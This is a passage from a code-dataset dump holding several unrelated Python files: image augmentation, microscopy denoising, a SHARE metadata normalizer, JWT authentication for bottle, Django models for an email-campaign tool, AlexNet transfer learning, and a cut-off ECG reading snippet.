def perspective_transform(self, X_img):\n        # Doing only for one type of example\n        perspective_matrix = self.get_perspective_matrices(X_img)\n        warped_img = cv2.warpPerspective(X_img, perspective_matrix,\n                                         (X_img.shape[1], X_img.shape[0]),\n                                         flags=cv2.INTER_LINEAR)\n        return warped_img\n\n    def add_gaussian_noise(self, X_imgs):\n        gaussian_noise_imgs = []\n        row, col, _ = X_imgs[0].shape\n        # Gaussian distribution parameters\n        mean = 0\n        var = 0.1\n        sigma = var ** 0.5\n\n        for X_img in X_imgs:\n            gaussian = np.random.random((row, col, 1)).astype(np.float32)\n            gaussian = np.concatenate((gaussian, gaussian, gaussian), axis=2)\n            gaussian_img = cv2.addWeighted(X_img, 0.75, 0.25 * gaussian, 0.25, 0)\n            gaussian_noise_imgs.append(gaussian_img)\n        gaussian_noise_imgs = np.array(gaussian_noise_imgs, dtype=np.float32)\n        return gaussian_noise_imgs\n\n\n    def add_salt_pepper_noise(self, X_imgs):\n        # Need to produce 
a copy as to not modify the original image\n X_imgs_copy = X_imgs.copy()\n row, col, _ = X_imgs_copy[0].shape\n salt_vs_pepper = 0.2\n amount = 0.004\n num_salt = np.ceil(amount * X_imgs_copy[0].size * salt_vs_pepper)\n num_pepper = np.ceil(amount * X_imgs_copy[0].size * (1.0 - salt_vs_pepper))\n\n for X_img in X_imgs_copy:\n # Add Salt noise\n coords = [np.random.randint(0, i - 1, int(num_salt)) for i in X_img.shape]\n X_img[coords[0], coords[1], :] = 1\n\n # Add Pepper noise\n coords = [np.random.randint(0, i - 1, int(num_pepper)) for i in X_img.shape]\n X_img[coords[0], coords[1], :] = 0\n return X_imgs_copy\n\n","sub_path":"Augmentation.py","file_name":"Augmentation.py","file_ext":"py","file_size_in_byte":4255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"300014141","text":"import numpy as np\nimport h5py\nimport re\n\nfrom csbdeep.models import Config, CARE\nimport numpy as np\nimport shutil\nimport os\nfrom csbdeep.utils import plot_some, plot_history\nfrom csbdeep.utils.n2v_utils import manipulate_val_data\n\n# We need to normalize the data before we feed it into our network, and denormalize it afterwards.\ndef normalize(img, mean, std):\n zero_mean = img - mean\n return zero_mean/std\n\ndef denormalize(x, mean, std):\n return x*std + mean\n\ndef sorted_nicely( l ):\n \"\"\" Sorts the given iterable in the way that is expected.\n\n Required arguments:\n l -- The iterable to be sorted.\n\n \"\"\"\n convert = lambda text: int(text) if text.isdigit() else text\n alphanum_key = lambda key: [convert(c) for c in re.split('([0-9]+)', key)]\n return sorted(l, key = alphanum_key)\n\ndef param(group, name):\n return 'G' + str(group) + '_' + name\n\ndef extract_results(filename):\n \"\"\" Extract intensity data from a FLIMfit results file.\n Converts any fraction data (e.g. 
beta, gamma) to contributions\n\n Required arguments:\n filename - the name of the file to load \n \"\"\"\n file = h5py.File(filename,'r') \n results = file['results']\n\n keys = sorted_nicely(results.keys())\n params = sorted_nicely(results['image 1'].keys())\n\n groups = []\n\n g = 1\n while(param(g,'I_0') in params):\n group = [param(g,'I_0')]\n\n name_search = [param(g,'gamma'), param(g,'beta')]\n\n for name in name_search:\n if len(group) == 1:\n group = group + [x for x in params if x.startswith(name)]\n\n groups.append(group)\n g = g + 1\n\n print(groups)\n\n X = []\n mask = []\n for k in keys:\n A = []\n m = np.array([False])\n\n for group in groups:\n I_0 = results[k][group[0]]\n m = m | ~np.isfinite(I_0)\n if len(group) == 1:\n A.append(I_0)\n else:\n for i in range(1,len(group)):\n A.append(results[k][group[i]][()] * I_0)\n\n A = np.stack(A, axis=-1)\n A[np.isnan(A)] = 0\n X.append(A)\n mask.append(m)\n \n X = np.stack(X)\n mask = np.stack(mask)\n\n return X, groups, mask\n\n\ndef insert_results(filename, X, groups):\n\n file = h5py.File(filename,'a') \n results = file['results']\n\n # Denoise all images\n for i in range(X.shape[0]):\n key = 'image ' + str(i+1)\n\n idx = 0\n for group in groups:\n num_image = max(1, len(group)-1)\n A = X[i,:,:,slice(idx,idx+num_image+1)]\n if len(group) > 1:\n I_0 = np.sum(A, axis=-1, keepdims=True)\n A = A / I_0\n A = np.concatenate((I_0, A), axis=2)\n for j in range(len(group)):\n results[key][group[j]].write_direct(np.ascontiguousarray(A[:,:,j]))\n\n idx = idx + num_image\n\ndef augment_data(X):\n\n XA = [];\n XA.append(X) \n XA.append(np.rot90(X, 1, axes=(1,2)))\n XA.append(np.rot90(X, 2, axes=(1,2)))\n XA.append(np.rot90(X, 3, axes=(1,2)))\n XA.append(np.flip(X, axis=1))\n XA.append(np.flip(X, axis=2))\n return np.concatenate(XA);\n\n\n\n\ndef n2v_flim(project, n2v_num_pix=32):\n \n results_file = os.path.join(project, 'fit_results.hdf5')\n\n X, groups, mask = extract_results(results_file)\n data_shape = np.shape(X)\n print(data_shape)\n\n mean, std = np.mean(X), np.std(X)\n X = normalize(X, mean, std)\n\n XA = X #augment_data(X)\n\n X_val = X[0:10,...]\n\n # We concatenate an extra channel filled with zeros. It will be internally used for the masking.\n Y = np.concatenate((XA, np.zeros(XA.shape)), axis=-1)\n Y_val = np.concatenate((X_val.copy(), np.zeros(X_val.shape)), axis=-1) \n\n n_x = X.shape[1]\n n_chan = X.shape[-1]\n\n manipulate_val_data(X_val, Y_val, num_pix=n_x*n_x*2/n2v_num_pix , shape=(n_x, n_x))\n\n\n # You can increase \"train_steps_per_epoch\" to get even better results at the price of longer computation. \n config = Config('SYXC', \n n_channel_in=n_chan, \n n_channel_out=n_chan, \n unet_kern_size = 5, \n unet_n_depth = 2,\n train_steps_per_epoch=200, \n train_loss='mae',\n train_epochs=35,\n batch_norm = False, \n train_scheme = 'Noise2Void', \n train_batch_size = 128, \n n2v_num_pix = n2v_num_pix,\n n2v_patch_shape = (n2v_num_pix, n2v_num_pix), \n n2v_manipulator = 'uniform_withCP', \n n2v_neighborhood_radius='5')\n\n vars(config)\n\n model = CARE(config, 'n2v_model', basedir=project)\n\n history = model.train(XA, Y, validation_data=(X_val,Y_val))\n\n model.load_weights(name='weights_best.h5')\n\n output_project = project.replace('.flimfit','-n2v.flimfit')\n if os.path.exists(output_project) : shutil.rmtree(output_project)\n shutil.copytree(project, output_project)\n\n output_file = os.path.join(output_project, 'fit_results.hdf5')\n\n X_pred = np.zeros(X.shape)\n for i in range(X.shape[0]):\n X_pred[i,...] 
= denormalize(model.predict(X[i], axes='YXC',normalizer=None), mean, std)\n\n X_pred[mask] = np.NaN\n\n insert_results(output_file, X_pred, groups)\n","sub_path":"n2v_flim.py","file_name":"n2v_flim.py","file_ext":"py","file_size_in_byte":5143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"160234860","text":"tipo_ingresso = {'Vip': 70, 'Normal': 50,'Estudante': 25};\ncliente = {}\n\ndef CadastrarCliente():\n\twhile True:\n\t\tnome_cliente = input('Digite o nome do cliente: ... s para voltar ao menu principal: ')\n\t\tif nome_cliente == 's':\n\t\t\tbreak\n\t\telse:\n\t\t\ttipo_ingresso_cliente = int(input('Digite o Tipo do ingresso: 1 - Vip, 2 - Normal, 3 - Estudante: '))\n\t\t\tif tipo_ingresso_cliente == 1:\n\t\t\t\tcliente[nome_cliente] = tipo_ingresso['Vip']\n\t\t\telif tipo_ingresso_cliente == 2:\n\t\t\t\tcliente[nome_cliente] = tipo_ingresso['Normal']\n\t\t\telif tipo_ingresso_cliente == 3:\n\t\t\t\tcliente[nome_cliente] = tipo_ingresso['Estudante']\n\ndef ListarClientes():\n\tfor cli in cliente:\n\t\t\n\t\tprint(\"\\n| Nome do Cliente: \", cli , \"- Cliente: \", list(tipo_ingresso.keys())[list(tipo_ingresso.values()).index(cliente[cli])],\"- Total: \" , str(cliente[cli]), \"\\n\")\n\nwhile True:\n\topc = int(input('Digite 1 - Cadastrar, 2 - Excluir, 3 - Procurar Cliente no sistema: '))\n\tif opc == 1:\n\t\tCadastrarCliente()\n\telif opc == 2: \n\t\tExcluir()\n\telif opc == 3:\n\t\tListarClientes()","sub_path":"Python/Marco/dicionarios e tuplas/exemplo1.py","file_name":"exemplo1.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"304934063","text":"import re\n\nfrom share.normalize import ctx, tools\nfrom share.normalize.parsers import Parser\nfrom share.normalize.normalizer import Normalizer\n\nTHE_REGEX = re.compile(r'(^the\\s|\\sthe\\s)')\n\n\nclass Link(Parser):\n url = ctx\n type = tools.Static('provider')\n\n\nclass ThroughLinks(Parser):\n link = tools.Delegate(Link, ctx)\n\n\nclass Publisher(Parser):\n\n name = ctx.name\n url = tools.OneOf(\n ctx.uri,\n tools.Join(ctx.sameAs),\n tools.Static(None),\n )\n\n class Extra:\n\n publisher = ctx\n\n\nclass Funder(Parser):\n\n community_identifier = tools.Try(ctx.sponsorIdentifier)\n name = ctx.sponsorName\n\n\nclass Award:\n\n # award will become name\n award = tools.Try(ctx.awardIdentifier)\n description = ctx.awardName\n url = tools.Try(ctx.awardIdentifier)\n\n\nclass ThroughAwards:\n\n award = tools.Delegate(Award, ctx)\n\n\nclass Institution(Parser):\n\n name = ctx.name\n\n\nclass Organization(Parser):\n\n name = ctx.name\n\n\nclass Association(Parser):\n pass\n\n\nclass Email(Parser):\n\n email = ctx\n\n\nclass PersonEmail(Parser):\n\n email = tools.Delegate(Email, ctx)\n\n\nclass Identifier(Parser):\n\n url = ctx\n\n\nclass ThroughIdentifiers(Parser):\n\n identifier = tools.Delegate(Identifier, ctx)\n\n\nclass Person(Parser):\n\n suffix = tools.ParseName(ctx.name).suffix\n family_name = tools.ParseName(ctx.name).last\n given_name = tools.ParseName(ctx.name).first\n additional_name = tools.ParseName(ctx.name).middle\n\n emails = tools.Map(\n tools.Delegate(PersonEmail),\n tools.Try(ctx.email)\n )\n affiliations = tools.Map(\n tools.Delegate(Association.using(entity=tools.Delegate(Organization))),\n tools.Try(ctx.affiliation)\n )\n\n identifiers = tools.Map(\n tools.Delegate(ThroughIdentifiers),\n tools.Try(ctx.sameAs)\n )\n\n class Extra:\n\n givenName = 
tools.Try(ctx.givenName)\n\n familyName = tools.Try(ctx.familyName)\n\n additonalName = tools.Try(ctx.additionalName)\n\n name = tools.Try(ctx.name)\n\n\nclass Contributor(Parser):\n\n person = tools.Delegate(Person, ctx)\n cited_name = ctx.name\n order_cited = ctx('index')\n\n\nclass Tag(Parser):\n\n name = ctx\n\n\nclass ThroughTags(Parser):\n\n tag = tools.Delegate(Tag, ctx)\n\n\nclass Subject(Parser):\n\n name = ctx\n\n\nclass ThroughSubjects(Parser):\n\n subject = tools.Delegate(Subject, ctx)\n\n\nclass CreativeWork(Parser):\n\n ORGANIZATION_KEYWORDS = (\n THE_REGEX,\n 'council',\n 'center',\n 'foundation'\n )\n INSTITUTION_KEYWORDS = (\n 'school',\n 'university',\n 'institution',\n 'college',\n 'institute'\n )\n\n awards = tools.Map(\n tools.Delegate(ThroughAwards),\n tools.Try(ctx.sponsorships.award)\n )\n\n contributors = tools.Map(\n tools.Delegate(Contributor),\n tools.RunPython(\n 'get_contributors',\n tools.Try(ctx.contributors),\n 'contributor'\n )\n )\n\n is_deleted = tools.RunPython('_is_deleted', tools.Try(ctx.otherProperties))\n\n date_updated = tools.ParseDate(tools.Try(ctx.providerUpdatedDateTime))\n\n description = tools.Try(ctx.description)\n\n funders = tools.Map(\n tools.Delegate(Association.using(entity=tools.Delegate(Funder))),\n tools.Try(ctx.sponsorships.sponsor)\n )\n\n institutions = tools.Map(\n tools.Delegate(Association.using(entity=tools.Delegate(Institution))),\n tools.RunPython(\n 'get_contributors',\n tools.Try(ctx.contributors),\n 'institution'\n )\n )\n\n # Note: this is only taking the first language in the case of multiple languages\n language = tools.ParseLanguage(\n tools.Try(ctx.languages[0]),\n )\n\n links = tools.Map(\n tools.Delegate(ThroughLinks),\n tools.RunPython(\n 'unique',\n tools.Concat(\n tools.Try(ctx.uris.canonicalUri),\n tools.Try(ctx.uris.providerUris),\n tools.Try(ctx.uris.descriptorUris),\n tools.Try(ctx.uris.objectUris)\n )\n )\n )\n\n organizations = tools.Map(\n tools.Delegate(Association.using(entity=tools.Delegate(Organization))),\n tools.RunPython(\n 'get_contributors',\n tools.Try(ctx.contributors),\n 'organization'\n )\n )\n\n # unsure how to tell difference between person and org\n publishers = tools.Map(\n tools.Delegate(Association.using(entity=tools.Delegate(Publisher))),\n tools.Try(ctx.publisher)\n )\n\n rights = tools.Join(tools.Try(ctx.licenses.uri))\n\n subjects = tools.Map(\n tools.Delegate(ThroughSubjects),\n tools.Try(ctx.subjects)\n )\n\n tags = tools.Map(\n tools.Delegate(ThroughTags),\n tools.Try(ctx.tags),\n tools.Try(ctx.subjects)\n )\n\n title = ctx.title\n\n class Extra:\n \"\"\"\n Fields that are combined in the base parser are relisted as singular elements that match\n their original entry to preserve raw data structure.\n \"\"\"\n\n freeToRead = tools.Try(ctx.freeToRead)\n\n languages = tools.Try(ctx.languages)\n\n licenses = tools.Try(ctx.licenses)\n\n otherProperties = tools.Try(ctx.otherProperties)\n\n publisher = tools.Try(ctx.publisher)\n\n subjects = tools.Try(ctx.subjects)\n\n sponsorships = tools.Try(ctx.sponsorships)\n\n tags = tools.Try(ctx.tags)\n\n uris = tools.Try(ctx.uris)\n\n version = tools.Try(ctx.version)\n\n def get_contributors(self, options, entity):\n \"\"\"\n Returns list of organization, institutions, or contributors names based on entity type.\n \"\"\"\n\n if entity == 'organization':\n organizations = [\n value for value in options if\n (\n value['name'] and\n not self.list_in_string(value['name'], self.INSTITUTION_KEYWORDS) and\n self.list_in_string(value['name'], 
self.ORGANIZATION_KEYWORDS)\n )\n ]\n return organizations\n elif entity == 'institution':\n institutions = [\n value for value in options if\n (\n value['name'] and\n self.list_in_string(value['name'], self.INSTITUTION_KEYWORDS)\n )\n ]\n return institutions\n elif entity == 'contributor':\n people = [\n value for value in options if\n (\n value['name'] and\n not self.list_in_string(value['name'], self.INSTITUTION_KEYWORDS) and not\n self.list_in_string(value['name'], self.ORGANIZATION_KEYWORDS)\n )\n ]\n return people\n else:\n return options\n\n def list_in_string(self, string, list_):\n for word in list_:\n if isinstance(word, str):\n if word in string.lower():\n return True\n else:\n if word.search(string):\n return True\n return False\n\n def unique(self, items):\n return list(sorted(set(items)))\n\n def _is_deleted(self, properties):\n for prop in properties or []:\n if prop['name'] == 'status':\n return 'deleted' in prop['properties'].get('status', [])\n return False\n\n\nclass V1Normalizer(Normalizer):\n root_parser = CreativeWork\n","sub_path":"share/normalize/v1_push.py","file_name":"v1_push.py","file_ext":"py","file_size_in_byte":7499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"650844061","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nExperiment to try out JWT based auth.\n\"\"\"\n\nimport functools\nimport datetime\nfrom bottle import request, abort\nimport jwt\n\n\nclass JWT(object):\n \"\"\"JWT token handling for bottle apps.\n \"\"\"\n def __init__(self, secret_key, algorithm='HS256'):\n self.secret_key = secret_key\n self.algorithm = algorithm\n\n def create_token(self, user, ttl=None):\n \"\"\"Creates a new signed JWT-valid token.\n\n :param user: the user\n :param ttl:\n :return: valid JWT with expiration signature\n \"\"\"\n payload = {}\n payload['sub'] = user\n payload['iat'] = datetime.datetime.utcnow()\n\n if ttl:\n payload['exp'] = datetime.datetime.utcnow() + \\\n datetime.timedelta(seconds=ttl)\n\n #logger.debug(\"Token created for payload: {}\".format(str(payload)))\n return jwt.encode(payload, self.secret_key, algorithm=self.algorithm)\n\n def _validate_token(self, token=''):\n \"\"\"Validate JWT token.\n\n :param token: a json webtoken string\n :return: the decrypted token data (dict)\n \"\"\"\n try:\n decoded = jwt.decode(\n token.split(\" \", 1).pop(),\n self.secret_key,\n algorithms=self.algorithm\n )\n if 'sub' in decoded:\n return decoded['sub']\n abort(401, 'Invalid access token provided.')\n except jwt.ExpiredSignatureError as e:\n abort(401, 'The access token has expired.')\n except jwt.DecodeError as e:\n abort(401, 'Invalid access token provided.')\n\n def auth_required(self, func):\n \"\"\"Decorator intended to be used with a bottle app.\n \"\"\"\n\n @functools.wraps(func)\n def wrapper(*a, **ka):\n\n user_token = request.get_header(\"Authorization\", '')\n user = self._validate_token(user_token) or False\n if user:\n ka['user'] = user\n return func(*a, **ka)\n\n return wrapper\n","sub_path":"lambda_bottle/jwt_token.py","file_name":"jwt_token.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"578807448","text":"from django.utils import timezone\nfrom datetime import datetime, timedelta\nfrom django.utils.dateformat import format\nfrom django.utils.dates import WEEKDAYS_ABBR\nfrom habits.models import Habit, HabitEntryBool, HabitEntryDecimal\n\n# Create your views here.\ndef getHabitData():\n # 
Get all active habits\n allActiveHabits = Habit.objects.filter(endDate=None)\n\n # last7Dates\n\n weekStart = 0\n while (datetime.now()+timedelta(days=weekStart)).isoweekday()!=1:\n weekStart -=1\n last7Dates = [datetime.now()+timedelta(days=x) for x in range(weekStart,weekStart+7)]\n last7Days = [WEEKDAYS_ABBR[x.weekday()] for x in last7Dates]\n \n # habit entries for last 7 days for each entry \n entryData = []\n for habit in allActiveHabits:\n tempArray = []\n todaySet = False\n for thisDate in last7Dates:\n if habit.habitIsDecimal:\n try:\n habitEntry = HabitEntryDecimal.objects.get(habit=habit, entryDate=thisDate)\n except HabitEntryDecimal.DoesNotExist:\n habitEntry = None\n else:\n try:\n habitEntry = HabitEntryBool.objects.get(habit=habit, entryDate=thisDate)\n except HabitEntryBool.DoesNotExist:\n habitEntry = None\n tempArray.append(habitEntry)\n if format(thisDate,\"d.m.y\") == format(datetime.now(), \"d.m.y\") and habitEntry:\n todaySet = True\n entryData.append( (habit, tempArray, todaySet) )\n return entryData, last7Days, last7Dates","sub_path":"displayer/habitHelper.py","file_name":"habitHelper.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"401170780","text":"import pickle\nimport tensorflow as tf\nfrom sklearn.model_selection import train_test_split\n# from sklearn.cross_validation import train_test_split\nfrom alexnet import AlexNet\nimport numpy as np\nfrom sklearn.utils import shuffle\nimport time\n\n# TODO: Load traffic signs data.\nwith open(\"train.p\", mode='rb') as f:\n train = pickle.load(f)\n\n# TODO: Split data into training and validation sets.\nfeatures = train['features']\nlabels = train['labels']\n\nX_train, X_val, y_train, y_val = train_test_split(features, labels, \n test_size = 0.33, \n random_state = 2016)\n\ngraph = tf.Graph()\n\nwith graph.as_default():\n\n# TODO: Define placeholders and resize operation.\n x = tf.placeholder(tf.float32, (None, 32, 32, 3))\n y = tf.placeholder(tf.int32, None)\n resized = tf.image.resize_images(x, [227,227])\n\n# TODO: pass placeholder as first argument to `AlexNet`.\n# By keeping `feature_extract` set to `True`\n# we indicate to NOT keep the 1000 class final layer\n# originally used to train on ImageNet.\n fc7 = AlexNet(resized, feature_extract=True)\n# NOTE: `tf.stop_gradient` prevents the gradient from flowing backwards\n# past this point, keeping the weights before and up to `fc7` frozen.\n# This also makes training faster, less work to do!\n fc7 = tf.stop_gradient(fc7)\n\n# TODO: Add the final layer for traffic sign classification.\n nb_classes = 43\n shape = (fc7.get_shape().as_list()[-1], nb_classes) \n w_tz = tf.Variable(tf.truncated_normal(shape=shape, \n stddev=tf.sqrt(2.0/shape[0])))\n b_tz = tf.zeros(shape[1])\n logits = tf.nn.xw_plus_b(fc7, w_tz, b_tz)\n\n# TODO: Define loss, training, accuracy operations.\n# HINT: Look back at your traffic signs project solution, you may\n# be able to reuse some the code.\n loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits, y))\n optimizer = tf.train.AdamOptimizer().minimize(loss)\n\n train_prediction = tf.nn.softmax(logits)\n \n# TODO: Train and evaluate the feature extraction model.\n\nacc_val = []\nloss_val = [] \n\nwith tf.Session(graph=graph) as sess: \n init = tf.global_variables_initializer()\n sess.run(init)\n \n nb_epochs = 1\n batch_size = 32\n \n def accuracy(pred, labels):\n return (np.sum(np.equal(np.argmax(pred, 
1),labels)))/pred.shape[0]\n \n \n for epoch in range(nb_epochs):\n t0 = time.time()\n total_batch = np.int(X_train.shape[0]/batch_size)\n X_train, y_train = shuffle(X_train, y_train)\n for i in range(total_batch):\n offset = i * batch_size\n batch_x = X_train[offset:(offset+batch_size), ]/255.0\n batch_y = y_train[offset:(offset+batch_size)]\n sess.run([optimizer, train_prediction], \n feed_dict={x: batch_x, y: batch_y})\n \n for k in range(0, X_val.shape[0], 57):\n l, p = sess.run([loss, train_prediction], \n feed_dict={x: X_val[k:(k+57), ],\n y: y_val[k:(k+57)]})\n acc_val.append(accuracy(p, y_val[k:(k+57)]))\n loss_val.append(l)\n print(\"Epoch {}: \".format(epoch))\n print(\"Time spend: {}\".format(time.time()-t0))\n print(\"Validation Loss: {}\".format(np.mean(loss_val)))\n print(\"Validation Accuracy: {:.3%}\".format(np.mean(acc_val)))\n\n\"\"\"\n(As a point of reference one epoch over the training set takes roughly 53-55 \nseconds with a GTX 970.)\nEpoch 0: \nTime spend: 932.5579879283905\nValidation Loss: 16.838653564453125\nValidation Accuracy: 21.470%\n\"\"\" \n \n \n ","sub_path":"train_feature_extraction.py","file_name":"train_feature_extraction.py","file_ext":"py","file_size_in_byte":3711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"615123523","text":"from django.db import models\nfrom core.dictcode import global_status, yes_no_status\n# Create your models here.\n\n\nclass BlasterBaseModel(models.Model):\n remark = models.TextField(verbose_name='备注', blank=True)\n create_time = models.DateTimeField(auto_now_add=True, verbose_name='创建时间')\n status = models.SmallIntegerField(choices=global_status, verbose_name='状态', default=1)\n\n class Meta:\n abstract = True\n\n @classmethod\n def getAll(cls):\n return cls.objects.filter(status__gt=0).all().order_by('-id')\n\n\nclass Platform(BlasterBaseModel):\n name = models.CharField(max_length=255, blank=True, verbose_name='名称')\n describe = models.CharField(max_length=512, blank=True, verbose_name='描述')\n website = models.URLField(max_length=512, blank=True, verbose_name='页面链接地址')\n soap_api_url = models.URLField(max_length=512, blank=True, verbose_name='soap_api_url')\n http_api_url = models.URLField(max_length=512, blank=True, verbose_name='http_api_url')\n login_name = models.CharField(max_length=255, blank=True, verbose_name='登录名')\n login_pwd = models.CharField(max_length=255, blank=True, verbose_name='登录密码')\n api_class_path = models.CharField(max_length=512, blank=True, verbose_name='api类路径')\n api_run_funtion_path = models.CharField(max_length=512, blank=True, verbose_name='class名')\n login_option = models.TextField(\n blank=True, verbose_name='登陆选项', default='{\"username\": \"{login_name}\", \"password\": \"{login_pwd}\"}'\n )\n\n class Meta:\n verbose_name = '发送邮件平台'\n\n def __str__(self):\n return self.name\n\n\nclass Brand(BlasterBaseModel):\n Platforms = models.ForeignKey(Platform, null=True, on_delete=models.DO_NOTHING, verbose_name='所属平台')\n fid = models.IntegerField(verbose_name='原id')\n name = models.CharField(max_length=255, blank=True, verbose_name='名称')\n\n class Meta:\n verbose_name = '发送平台品牌'\n\n def __str__(self):\n return self.name\n\n\nclass Campaign(BlasterBaseModel):\n Brands = models.ForeignKey(Brand, null=True, on_delete=models.DO_NOTHING, verbose_name='所属品牌')\n fid = models.IntegerField(verbose_name='原id')\n name = models.CharField(max_length=255, blank=True, verbose_name='名称')\n create_time = models.DateTimeField(auto_now_add=True, 
verbose_name='创建时间')\n create_date = models.DateTimeField(blank=True, verbose_name='平台创建时间')\n status = models.SmallIntegerField(choices=global_status, verbose_name='状态', default=1)\n is_overall = models.SmallIntegerField(choices=yes_no_status, verbose_name='是否整体', default=0)\n is_active = models.SmallIntegerField(choices=yes_no_status, verbose_name='是否活动', default=1)\n has_soap_api = models.SmallIntegerField(choices=yes_no_status, verbose_name='是否soap_api', default=1)\n\n class Meta:\n verbose_name = '发送平台活动'\n\n def __str__(self):\n return self.name\n\n @classmethod\n def getCampaignGroupByBrands(cls, Campaign_id=None):\n where = {'status__gt': 0, 'is_active': 1, 'has_soap_api': 1}\n if Campaign_id:\n where.update({'id': Campaign_id})\n brands = Brand.getAll()\n for b in brands:\n where.update({'Brands_id': b.id})\n b.Campaigns = cls.objects.filter(**where).all()\n return brands\n\n\nclass CampaignClassify(BlasterBaseModel):\n name = models.CharField(max_length=255, null=True, blank=True, verbose_name='分类名称')\n parentid = models.ForeignKey('CampaignClassify', null=True, blank=True,\n on_delete=models.DO_NOTHING, verbose_name='上一级')\n Campaigns = models.ManyToManyField(Campaign, blank=True, verbose_name='关联平台活动')\n\n class Meta:\n verbose_name = '发送活动区域自定义归类'\n\n def __str__(self):\n return self.name\n\n @classmethod\n def getFull(cls, pid=[], out_list=[]):\n if not pid:\n pd = list(cls.objects.filter(parentid_id=None).all())\n else:\n pd = list(cls.objects.filter(parentid_id__in=pid).all())\n if pd:\n pid = []\n [pid.append(r.id) for r in pd]\n out_list.extend(pd)\n return cls.getFull(pid, out_list)\n else:\n return out_list\n\n\nclass SendEmail(models.Model):\n \"\"\"\n 所有发送的邮箱\n \"\"\"\n email = models.EmailField(max_length=254, blank=True, verbose_name='邮箱', unique=True)\n teacher_id = models.IntegerField( verbose_name='客户id', blank=True, default=0)\n\n class Meta:\n verbose_name = '发送平台所有邮箱'\n\n def __str__(self):\n return self.email\n\n\nclass Mailing(BlasterBaseModel):\n Campaigns = models.ForeignKey(Campaign, null=True, on_delete=models.DO_NOTHING, verbose_name='所属平台活动')\n fid = models.IntegerField(verbose_name='原id')\n name = models.CharField(max_length=255, blank=True, verbose_name='名称')\n subject = models.CharField(max_length=255, blank=True, verbose_name='主题')\n preheader = models.CharField(max_length=255, blank=True, verbose_name='邮件头')\n kind = models.CharField(max_length=24, blank=True, verbose_name='邮件类型')\n priority = models.CharField(max_length=5, blank=True, verbose_name='邮件优先级(1-5,3=正常)')\n from_name = models.CharField(max_length=255, blank=True, verbose_name='from_name')\n sender_id = models.CharField(max_length=24, blank=True, verbose_name='sender_id')\n plaintext_msg = models.CharField(max_length=255, blank=True, verbose_name='plaintext_msg')\n attachment = models.CharField(max_length=12, blank=True, verbose_name='attachment')\n optin_confirm_candidate = models.SmallIntegerField(\n choices=yes_no_status, verbose_name='optin_confirm_candidate', default=0\n )\n\n history = models.TextField(verbose_name='历史', blank=True)\n last_mod_date = models.DateTimeField(verbose_name='最后修改时间', blank=True, null=True)\n last_def_sent_date = models.DateTimeField(verbose_name='最后投递时间', blank=True, null=True)\n last_mod_user = models.CharField(max_length=128, blank=True, verbose_name='最后修改人')\n weblink = models.CharField(max_length=255, blank=True, verbose_name='网址')\n\n total_sent = models.IntegerField(blank=True, verbose_name='投递总数', default=0)\n total_accepted = 
models.IntegerField(blank=True, verbose_name='投递成功', default=0)\n    hardbounces = models.IntegerField(blank=True, verbose_name='硬退', default=0)\n    softbounces = models.IntegerField(blank=True, verbose_name='软退', default=0)\n    unsubscribers = models.IntegerField(blank=True, verbose_name='取消订阅', default=0)\n    suspends = models.IntegerField(blank=True, verbose_name='临时取消订阅', default=0)\n    spamcomplaints = models.IntegerField(blank=True, verbose_name='SPAM投诉数', default=0)\n    unique_opens = models.IntegerField(blank=True, verbose_name='独立打开', default=0)\n    total_renders = models.IntegerField(blank=True, verbose_name='呈现总数', default=0)\n    unique_renders = models.IntegerField(blank=True, verbose_name='独立呈现', default=0)\n    total_clickthroughs = models.IntegerField(blank=True, verbose_name='总点击次数', default=0)\n    unique_clickthroughs = models.IntegerField(blank=True, verbose_name='独立点击', default=0)\n    unique_link_clickthroughs = models.IntegerField(blank=True, verbose_name='独立链接点击', default=0)\n    total_conversion = models.IntegerField(blank=True, verbose_name='转发总数', default=0)\n    unique_conversion = models.IntegerField(blank=True, verbose_name='独立转发', default=0)\n    is_email_mailing = models.SmallIntegerField(choices=yes_no_status, verbose_name='是否已获取明细', default=0)\n\n    class Meta:\n        verbose_name = '群发任务'\n\n    def __str__(self):\n        return self.name\n\n\nclass EmailMailing(BlasterBaseModel):\n    SendEmails = models.ForeignKey(SendEmail, null=True, on_delete=models.DO_NOTHING, verbose_name='关联邮箱')\n    Mailings = models.ForeignKey(Mailing, null=True, on_delete=models.DO_NOTHING, verbose_name='关联发送任务')\n    hard = models.SmallIntegerField(choices=yes_no_status, verbose_name='硬退', default=0)\n    soft = models.SmallIntegerField(choices=yes_no_status, verbose_name='软退', default=0)\n    send = models.SmallIntegerField(choices=yes_no_status, verbose_name='投递成功', default=0)\n    open = models.SmallIntegerField(choices=yes_no_status, verbose_name='打开', default=0)\n    click = models.SmallIntegerField(choices=yes_no_status, verbose_name='点击', default=0)\n    trigger = models.SmallIntegerField(choices=yes_no_status, verbose_name='触发', default=0)\n    log_date = models.DateTimeField(blank=True, verbose_name='行为时间', null=True)\n\n    class Meta:\n        verbose_name = '邮箱-发送任务-投递状态'\n\n    def __str__(self):\n        return '{} {}'.format(self.Mailings.name, self.SendEmails.email)\n\n    @classmethod\n    def status(cls):\n        return {'hard': '硬退', 'soft': '软退', 'send': '投递成功', 'open': '打开', 'click': '点击', 'trigger': '触发'}","sub_path":"sendblaster/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":9247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"219889403","text":"from scipy import signal\nfrom sklearn.decomposition import FastICA\nimport glob\nimport wfdb as wf\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\n\ndef ann_vis_ex(path):\n    # Select one of them\n\n    # Read in the data\n    record = wf.rdsamp(path)\n    annotation = wf.rdann(path, 'atr')\n\n    # Select one of the channels (there are two)\n    chid = 0\n    data = 